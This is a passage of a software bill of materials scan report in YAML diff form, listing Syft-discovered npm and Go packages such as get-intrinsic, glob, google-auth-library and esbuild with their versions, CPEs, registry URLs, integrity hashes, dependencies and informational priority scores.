evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/get-intrinsic@1.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz + integrity: sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ== + dependencies: + call-bind-apply-helpers: ^1.0.2 + es-define-property: ^1.0.1 + es-errors: ^1.3.0 + es-object-atoms: ^1.1.1 + function-bind: ^1.1.2 + get-proto: ^1.0.1 + gopd: ^1.2.0 + has-symbols: ^1.1.0 + hasown: ^2.0.2 + math-intrinsics: ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 13f511e3eb23bc5c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: get-proto 1.0.1' + title: get-proto 1.0.1 + description: 'Package discovered: get-proto 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 64572c87855a75b1 + name: get-proto + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/get-proto@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz + integrity: sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g== + dependencies: + dunder-proto: ^1.0.1 + es-object-atoms: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9565869711547f61 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/@esbuild/darwin-arm64/bin/esbuild + startLine: 0 + message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' + title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2 + description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0b617a8d86aea060 + name: github.com/evanw/esbuild + version: v0.0.0-20240609211631-fc37c2fa9de2 + type: go-module + foundBy: go-module-binary-cataloger + locations: + - path: /node_modules/@esbuild/darwin-arm64/bin/esbuild + accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild + annotations: + evidence: primary + licenses: [] + language: go + cpes: + - cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2 + metadataType: go-module-buildinfo-entry + metadata: + goBuildSettings: + - key: -buildmode + value: exe + - key: -compiler + value: gc + - key: -trimpath + value: 'true' + - key: CGO_ENABLED + value: '0' + - key: GOARCH + value: arm64 + - key: GOOS + value: darwin + - key: vcs + value: git + - key: vcs.revision + value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e + - key: vcs.time + value: '2024-06-09T21:16:31Z' + - key: vcs.modified + value: 'false' + goCompiledVersion: go1.20.12 + architecture: arm64 + mainModule: github.com/evanw/esbuild + goCryptoSettings: + - standard-crypto + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 701c2b7f153ed08a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/esbuild/bin/esbuild + startLine: 0 + message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' + title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2 + description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0dc26b5347e8f4df + name: github.com/evanw/esbuild + version: v0.0.0-20240609211631-fc37c2fa9de2 + type: go-module + foundBy: go-module-binary-cataloger + locations: + - path: /node_modules/esbuild/bin/esbuild + accessPath: /node_modules/esbuild/bin/esbuild + annotations: + evidence: primary + licenses: [] + language: go + cpes: + - cpe: cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2 + metadataType: go-module-buildinfo-entry + metadata: + goBuildSettings: + - key: -buildmode + value: exe + - key: -compiler + value: gc + - key: -trimpath + value: 'true' + - key: CGO_ENABLED + value: '0' + - key: GOARCH + value: arm64 + - key: GOOS + value: darwin + - key: vcs + value: git + - key: vcs.revision + value: fc37c2fa9de2ad77476a6d4a8f1516196b90187e + - key: vcs.time + value: '2024-06-09T21:16:31Z' + - key: vcs.modified + value: 'false' + goCompiledVersion: go1.20.12 + architecture: arm64 + mainModule: github.com/evanw/esbuild + goCryptoSettings: + - standard-crypto + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0bd7d35ef088b0fd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: glob 10.5.0' + title: glob 10.5.0 + description: 'Package discovered: glob 10.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8da722cb9983d6b3 + name: glob + version: 10.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/glob@10.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/glob/-/glob-10.5.0.tgz + integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg== + dependencies: + foreground-child: ^3.1.0 + jackspeak: ^3.1.2 + minimatch: ^9.0.4 + minipass: ^7.1.2 + package-json-from-dist: ^1.0.0 + path-scurry: ^1.11.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 282a3bcad6a151e3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: glob-parent 5.1.2' + title: glob-parent 5.1.2 + description: 'Package discovered: glob-parent 5.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e9e84f484cfaf367 + name: glob-parent + version: 5.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/glob-parent@5.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz + integrity: sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow== + dependencies: + is-glob: ^4.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4709c0ff6455a8d2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: glob-parent 6.0.2' + title: glob-parent 6.0.2 + description: 'Package discovered: glob-parent 6.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1644b4942c7696f6 + name: glob-parent + version: 6.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/glob-parent@6.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz + integrity: sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A== + dependencies: + is-glob: ^4.0.3 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0dbbd23e15d1e62b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/@esbuild/darwin-arm64/bin/esbuild + startLine: 0 + message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' + title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8 + description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7890a665ce9e5849 + name: golang.org/x/sys + version: v0.0.0-20220715151400-c0bba94af5f8 + type: go-module + foundBy: go-module-binary-cataloger + locations: + - path: /node_modules/@esbuild/darwin-arm64/bin/esbuild + accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild + annotations: + evidence: primary + licenses: [] + language: go + cpes: + - cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8 + metadataType: go-module-buildinfo-entry + metadata: + goCompiledVersion: go1.20.12 + architecture: arm64 + h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ= + mainModule: github.com/evanw/esbuild + goCryptoSettings: + - standard-crypto + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5c6e328f37ad400d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /node_modules/esbuild/bin/esbuild + startLine: 0 + message: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' + title: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8 + description: 'Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 839067488ff020a0 + name: golang.org/x/sys + version: v0.0.0-20220715151400-c0bba94af5f8 + type: go-module + foundBy: go-module-binary-cataloger + locations: + - path: /node_modules/esbuild/bin/esbuild + accessPath: /node_modules/esbuild/bin/esbuild + annotations: + evidence: primary + licenses: [] + language: go + cpes: + - cpe: cpe:2.3:a:golang:x\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8 + metadataType: go-module-buildinfo-entry + metadata: + goCompiledVersion: go1.20.12 + architecture: arm64 + h1Digest: h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ= + mainModule: github.com/evanw/esbuild + goCryptoSettings: + - standard-crypto + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 59d2bd18fdd1d561 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: google-auth-library 9.15.1' + title: google-auth-library 9.15.1 + description: 'Package discovered: google-auth-library 9.15.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4fb04863a4dacd73 + name: google-auth-library + version: 9.15.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/google-auth-library@9.15.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz + integrity: sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng== + dependencies: + base64-js: ^1.3.0 + ecdsa-sig-formatter: ^1.0.11 + gaxios: ^6.1.1 + gcp-metadata: ^6.1.0 + gtoken: ^7.0.0 + jws: ^4.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f744ca691ff58390 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: google-gax 4.6.1' + title: google-gax 4.6.1 + description: 'Package discovered: google-gax 4.6.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3344aade71052029 + name: google-gax + version: 4.6.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/google-gax@4.6.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz + integrity: sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ== + dependencies: + '@grpc/grpc-js': ^1.10.9 + '@grpc/proto-loader': ^0.7.13 + '@types/long': ^4.0.0 + abort-controller: ^3.0.0 + duplexify: ^4.0.0 + google-auth-library: ^9.3.0 + node-fetch: ^2.7.0 + object-hash: ^3.0.0 + proto3-json-serializer: ^2.0.2 + protobufjs: ^7.3.2 + retry-request: ^7.0.0 + uuid: ^9.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 38ca80e4adb1c1ba + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: google-logging-utils 0.0.2' + title: google-logging-utils 0.0.2 + description: 'Package discovered: google-logging-utils 0.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c45a9f7f7c5a1d26 + name: google-logging-utils + version: 0.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/google-logging-utils@0.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz + integrity: sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bb6c934fdca5487f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: gopd 1.2.0' + title: gopd 1.2.0 + description: 'Package discovered: gopd 1.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2f2433574e565258 + name: gopd + version: 1.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/gopd@1.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz + integrity: sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 30861bd8904bacc9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: graceful-fs 4.2.11' + title: graceful-fs 4.2.11 + description: 'Package discovered: graceful-fs 4.2.11' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 45319b4c36cfb339 + name: graceful-fs + version: 4.2.11 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/graceful-fs@4.2.11 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz + integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a916a255ccf430d7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: gtoken 7.1.0' + title: gtoken 7.1.0 + description: 'Package discovered: gtoken 7.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fe4d11ddc8ba95f7 + name: gtoken + version: 7.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/gtoken@7.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz + integrity: sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw== + dependencies: + gaxios: ^6.0.0 + jws: ^4.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d28454794acf7740 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: has-symbols 1.1.0' + title: has-symbols 1.1.0 + description: 'Package discovered: has-symbols 1.1.0' + remediation: Track and scan dependencies. + references: [] + 